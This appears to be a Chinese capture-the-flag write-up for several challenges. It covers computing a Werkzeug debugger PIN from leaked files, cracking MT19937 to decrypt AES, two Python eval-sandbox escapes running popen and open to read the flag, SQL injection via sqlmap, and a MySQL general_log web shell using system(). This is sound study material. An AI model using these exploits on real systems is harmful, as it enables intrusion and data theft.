/proc/sys/kernel/random/boot_id----->d45a88e1-3fe4-4156-9e59-3864587b7c87 #private
/proc/self/cgroup ----->0::/
/../../../../../../../etc/passwd----->root:x:0:0:root:/root:/bin/ #pub
/usr/local/lib/python3.10/site-packages/werkzeug/debug/__init__.py #挨个试
算pin的exp
import hashlib
from itertools import chain
def mac_to_decimal(mac_address):
hex_pairs = mac_address.split(':')
decimal_value = 0
# 将每个十六进制对转换为十进制并累加
for hex_pair in hex_pairs:
decimal_value = (decimal_value << 8) + int(hex_pair, 16)
return decimal_value
mac_address = "b6:45:6c:7d:2e:b1" # /sys/class/net/eth0/address
# 调用函数将 MAC 地址转换为十进制数值
mac = str(mac_to_decimal(mac_address))
probably_public_bits = [
'root' # username 可通过/etc/passwd获取
'flask.app', # modname默认值
'Flask', # 默认值
'/usr/local/lib/python3.10/site-packages/flask/app.py'
]
private_bits = [
mac, # mac地址十进制
'd45a88e1-3fe4-4156-9e59-3864587b7c87'
# /proc/sys/kernel/random/boot_id + /proc/self/cgroup (name=systemd:) /proc/self/cgroup为空不用看
]
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv = None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
因为每个请求都要host,可以看源码提交
?__debugger__=yes&cmd=pinauth&pin=293-579-492&s=EiqMhkW0qaOHzFnqNEn3
获取cookie
__wzd6bde80ed812309855c21=1730390066|aad426b2f48c
week4
crypto
MT19937
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import ast
class MT19937:
def __init__(self, state=None):
self.w, self.n, self.m, self.r = 32, 624, 397, 31
self.a = 0x9908B0DF
self.u, self.d = 11, 0xFFFFFFFF
self.s, self.b = 7, 0x9D2C5680
self.t, self.c = 15, 0xEFC60000
self.l = 18
self.index = self.n
if state:
# 确保状态数组长度为624
self.MT = list(state)
while len(self.MT) < self.n:
self.MT.append(0)
self.MT = self.MT[:self.n]
else:
self.MT = [0] * self.n
def twist(self):
lower_mask = (1 << self.r) - 1
upper_mask = (~lower_mask) & 0xFFFFFFFF
for i in range(self.n):
x = (self.MT[i] & upper_mask) | (self.MT[(i + 1) % self.n] & lower_mask)
xA = x >> 1
if x & 1:
xA ^= self.a
self.MT[i] = self.MT[(i + self.m) % self.n] ^ xA
self.index = 0
def extract_number(self):
if self.index >= self.n:
self.twist()
y = self.MT[self.index]
y = y ^ ((y >> self.u) & self.d)
y = y ^ ((y << self.s) & self.b)
y = y ^ ((y << self.t) & self.c)
y = y ^ (y >> self.l)
self.index += 1
return y & 0xFFFFFFFF
def untemper(y):
y = y & 0xFFFFFFFF
# Reverse right shift 18
y = y ^ (y >> 18)
# Reverse left shift 15 and mask
temp = y
for i in range(2):
temp = y ^ ((temp << 15) & 0xEFC60000)
y = temp
# Reverse left shift 7 and mask
temp = y
for i in range(4):
temp = y ^ ((temp << 7) & 0x9D2C5680)
y = temp
# Reverse right shift 11
temp = y
for i in range(3):
temp = y ^ (temp >> 11)
y = temp
return y & 0xFFFFFFFF
def predict_next(outputs, num_predict):
state = [untemper(x) for x in outputs]
mt = MT19937(state)
predicted = []
for _ in range(num_predict):
predicted.append(mt.extract_number())
return predicted
def solve():
# Read data.txt
with open('data.txt', 'r') as f:
lines = f.readlines()
K1_outputs = ast.literal_eval(lines[0].strip())
K2_outputs = ast.literal_eval(lines[1].strip())
c1 = ast.literal_eval(lines[2].strip())
c2 = ast.literal_eval(lines[3].strip())
print("Length of K1_outputs:", len(K1_outputs))
print("Length of K2_outputs:", len(K2_outputs))
# Calculate cal values
# 对于K1,我们使用全部624个状态
cal1 = 0
next_nums1 = predict_next(K1_outputs, 624)
cal1 = sum(next_nums1)
print("cal1 calculated:", cal1)
# 对于K2,我们只使用前600个状态,但仍需预测156个数
cal2 = 0
next_nums2 = predict_next(K2_outputs, 156) # 624//4 = 156
cal2 = sum(next_nums2)
print("cal2 calculated:", cal2)
def decrypt(cal, ciphertext):
key = hashlib.sha256(str(cal).encode()).digest()
cipher = AES.new(key, AES.MODE_ECB)
return unpad(cipher.decrypt(ciphertext), 16)
try:
print("Attempting decryption...")
m1 = decrypt(cal1, bytes(c1))
m2 = decrypt(cal2, bytes(c2))
flag = m1 + m2
return flag
except Exception as e:
print(f"Decryption error: {e}")
print(f"cal1: {cal1}")
print(f"cal2: {cal2}")
return None
if __name__ == '__main__':
print("Starting solver...")
flag = solve()
if flag:
try:
print("Flag:", flag.decode())
except:
print("Flag (raw):", flag)
else:
print("Failed to recover flag")
web(复现)
0进制计算器
from flask import Flask, render_template, request, jsonify
app = Flask(__name__)
@app.route('/')
def home():
return render_template('index.html')
@app.route('/execute', methods=['POST'])
def execute_code():
data = request.json
code = data.get('code', '')
output = executer(code)
return output
from contextlib import redirect_stdout
from io import StringIO
class StupidInterpreter:
def __init__(self):
self.variables = {}
def interpret(self, code):
if self.checker(code) == False:
print("有脏东西!")
return("")
commands = code.split(';')
for command in commands:
command = command.strip()
if command:
self.execute_command(command)
def execute_command(self, command):
if '=' in command:
variable, expression = command.split('=', 1)
variable = variable.strip()
result = self.evaluate_expression(expression.strip())
self.variables[variable] = result
#执行打印操作
elif command.startswith('cdhor(') and command.endswith(')'):
expression = command[6:-1].strip()
result = self.evaluate_expression(expression)
print(result)
else:
print(f"未知指令: {command}")
return("")
def evaluate_expression(self, expression):
for var, value in self.variables.items():
expression = expression.replace(var, str(value))
try:
return eval(expression, {}, {})
except Exception as e:
print(f"执行出错: {e}")
return None
def checker(self, string):
try:
string.encode("ascii")
except UnicodeEncodeError:
return False
allow_chr = '0cdhor+-*/=()"\'; '
for char in string:
if char not in allow_chr:
return False
def executer(code):
outputIO = StringIO()
interpreter = StupidInterpreter()
with redirect_stdout(outputIO):
interpreter.interpret(code)
output = outputIO.getvalue()
return(output)
if __name__ == '__main__':
app.run(debug=False)
allow_chr = '0cdhor+-*/=()"\'; '
这是运行通过的字符,eval可以执行的一是"=“号右侧的部分,二是cdhor()内的部分
cdhor刚好可以组成chr和ord,可以利用这两个函数来组成任意字符。chr(ord())形式的代码可以在等号右侧被转换为需要执行的代码后,再经过cdhor()执行并输出结果
def generate_char(char):
char_ascii_bin = str(bin(ord(char)))
result = []
index = len(char_ascii_bin) - 1
for a in char_ascii_bin:
if index == 0 and a == "1":
result.append("(ord('*')-ord(')'))")
break
if index != 0 and a == "1":
mid_res = ["(ord('*')-ord('('))" for i in range(index)]
result.append("*".join(mid_res))
index -= 1
return("+".join(result))
def generate_sentence(string):
char_expressions = ["chr(" + generate_char(char) + ")" for char in string]
sentence_expression = "+".join(char_expressions)
return(sentence_expression)
# 定义字符串
sentence = """__import__('os').popen('cat /fl44gggg').read()"""
# 生成表达式
generated_expression = generate_sentence(sentence)
# 打印生成的表达式
print("Generated Expression:")
print(generated_expression)
# 执行并打印结果
result = eval(generated_expression)
print("\nExecution Result:")
print(result)
解密脚本的大致原理是设定了权值,将代码转化为ASCII再转化为二进制的形式,按照给定的权值进行转化,最后再拼接,本地可以测试测试。
0进制计算器 pro max
先上源码
from flask import Flask, render_template, request, jsonify
from contextlib import redirect_stdout
from io import StringIO
from sys import addaudithook
audit_enabled = False
dangerous_operation_detected = False
app = Flask(__name__)
@app.route('/')
def home():
return render_template('index.html')
@app.route('/execute', methods=['POST'])
def execute_code():
data = request.json
code = data.get('code', '')
output = executer(code)
return output
dangerous_operations = [
"marshal", "__new__", "process", "os", "sys", "interpreter", "open",
"cpython", "compile", "gc"
]
dangerous_strings = ["__", "getattr", "exit"]
dangerous_opcodes = ["LOAD_GLOBAL", "IMPORT_NAME", "LOAD_METHOD"]
allowed_functions = ["print"]
class CleverInterpreter:
def __init__(self):
self.variables = {}
def interpret(self, code):
if self.checker(code) == False:
print("有脏东西!")
return("")
commands = code.split(';')
for command in commands:
command = command.strip()
if command:
self.execute_command(command)
def execute_command(self, command):
if '=' in command:
variable, expression = command.split('=', 1)
variable = variable.strip()
result = self.evaluate_expression(expression.strip())
self.variables[variable] = result
# 执行打印操作
elif command.startswith('cdhor(') and command.endswith(')'):
expression = command[6:-1].strip()
result = self.safe_executer('print(' + expression + ')')
print(result)
else:
print(f"未知指令: {command}")
return("")
def evaluate_expression(self, expression):
for var, value in self.variables.items():
expression = expression.replace(var, str(value))
try:
return eval(expression, {}, {})
except Exception as e:
print(f"执行出错: {e}")
return None
def safe_executer(self, expression):
global audit_enabled
output = ""
def exec_code(code):
outputIO = StringIO()
with redirect_stdout(outputIO):
exec(code, {
"__builtins__": None,
"print": print
}, None)
output = outputIO.getvalue()
return output
for var, value in self.variables.items():
expression = expression.replace(var, str(value))
if self.clever_checker(expression) == False:
return("大傻春 你要干什么!")
code = compile(expression, "<sandbox>", "exec")
# 启用审计
audit_enabled = True
try:
output = exec_code(code)
except Exception as e:
print(f"执行出错: {e}")
finally:
# 关闭审计
audit_enabled = False
return output
def checker(self, code):
allow_chr = '0cdhor+-*/=()"\'; '
for char in code:
if char not in allow_chr:
return False
def clever_checker(self, code):
def simple_checker(source):
try:
source.encode("ascii")
except UnicodeEncodeError:
return False
for dangerous in dangerous_strings:
if dangerous in source.lower():
print(dangerous)
return False
return True
def opcode_checker(code):
from dis import dis
from io import StringIO
opcode_output = StringIO()
dis(code, file=opcode_output)
opcodes = opcode_output.getvalue().splitlines()
opcode_output.close()
for line in opcodes:
if any(opcode in line for opcode in dangerous_opcodes):
if any(func in line for func in allowed_functions):
continue
print("".join(opcode for opcode in dangerous_opcodes if opcode in line))
return False
return True
return simple_checker(code) and opcode_checker(code)
def block_wrapper():
def audit(event, args):
global audit_enabled, dangerous_operation_detected
dangerous_operation_detected = False
if audit_enabled:
event_info = event + "".join(str(arg) for arg in args)
event_info_lower = event_info.lower()
for dangerous in dangerous_operations:
if dangerous in event_info_lower:
global dangerous_operation
dangerous_operation_detected = True
dangerous_operation = dangerous
return
else:
return
return audit
def executer(code):
outputIO = StringIO()
interpreter = CleverInterpreter()
with redirect_stdout(outputIO):
interpreter.interpret(code)
output = outputIO.getvalue()
if dangerous_operation_detected:
output = ""
return ("危险操作: " + dangerous_operation)
else:
return(output)
if __name__ == '__main__':
addaudithook(block_wrapper())
app.run(debug=False, port=80, host="0.0.0.0")
参考文章https://www.cnblogs.com/gaorenyusi/p/18242719
考察的是python栈帧沙箱逃逸(妹听过啊)
三个安全模块是通过遍历下面三个列表对代码进行过滤的,而通过栈帧逃逸,我们可以访问到全局变量,因此只需要获取到全局变量表,将下面三个列表设为空即可
dangerous_operations = [
"marshal", "__new__", "process", "os", "sys", "interpreter", "open",
"cpython", "compile", "gc"
]
dangerous_strings = ["__", "getattr", "exit"]
dangerous_opcodes = ["LOAD_GLOBAL", "IMPORT_NAME", "LOAD_METHOD"]
注意要把题目里的print闭合,官p说的是在前面的改
先输入
sentence = """0)
def exp():
def scq():
yield scq.gi_frame.f_back
scq = scq()
frame = [x for x in scq][0]
frame.f_back.f_back.f_back.f_globals["dangerous_operations"] = []
frame.f_back.f_back.f_back.f_globals["dangerous_opcodes"] = []
frame.f_back.f_back.f_back.f_globals["dangerous_strings"] = []
exp()
print(0
"""
设置完成后就可以直接读取flag
sentence = """0)
def exp():
def scq():
yield scq.gi_frame.f_back
scq = scq()
frame = [x for x in scq][0]
gattr = frame.f_back.f_back.f_back.f_globals["_"*2+"builtins"+"_"*2]
open = gattr.open
print(open("/fl44gggg", "r").read())
exp()
print(0
"""
只是浮现了一下,知识点会放在学习计划中
可恶的骗子
官方给了两个解法都学习一下
0x01
聊天记录内url拼接到靶机,显示用手机打开,使用手机ua进行访问
ClickID参数单引号报错,存在sql注入
构造一个ua头
Mozilla/5.0 (Linux; Android 12; Pixel 6 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36
/Xianyu_goods/index.php?ClickID=161'
加个单引号发现有sql的报错
用sqlmap跑一下看看
python sqlmap.py -u http://210.44.150.15:36930/Xianyu_goods/index.php?ClickID=161 --user-agent='Mozilla/5.0 (Linux; Android 12; Pixel 6 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36' -D root -T admin_user --dump
最后的数据是
root::shctf_xianyu_password登入后台
具体getshell流程可以参考这篇phpMyAdmin利用日志文件GetSHELL-腾讯云开发者社区-腾讯云
登陆后使用日志写入php代码,首先启用日志
Set global general_log = on;
接着设置日志路径,扫描后发现Xianyu_goods下有go.php
Set global general_log_file = '/var/www/html/Xianyu_goods/go.php';
然后执行
select '<?php system("cat /flag"); ?>';
最后进入对应界面就好了
0x02
根据聊天记录,网上搜索仿咸鱼 转转 交易猫系统源码等关键字,找到此系统源码
下载后使用工具进行审计,发现index.php存在文件包含,通过HTTP参数控制
文件自己审查一下,用常用的工具审一遍。
/Xianyu_goods/index.php?ClickID=161&HTYP=/flag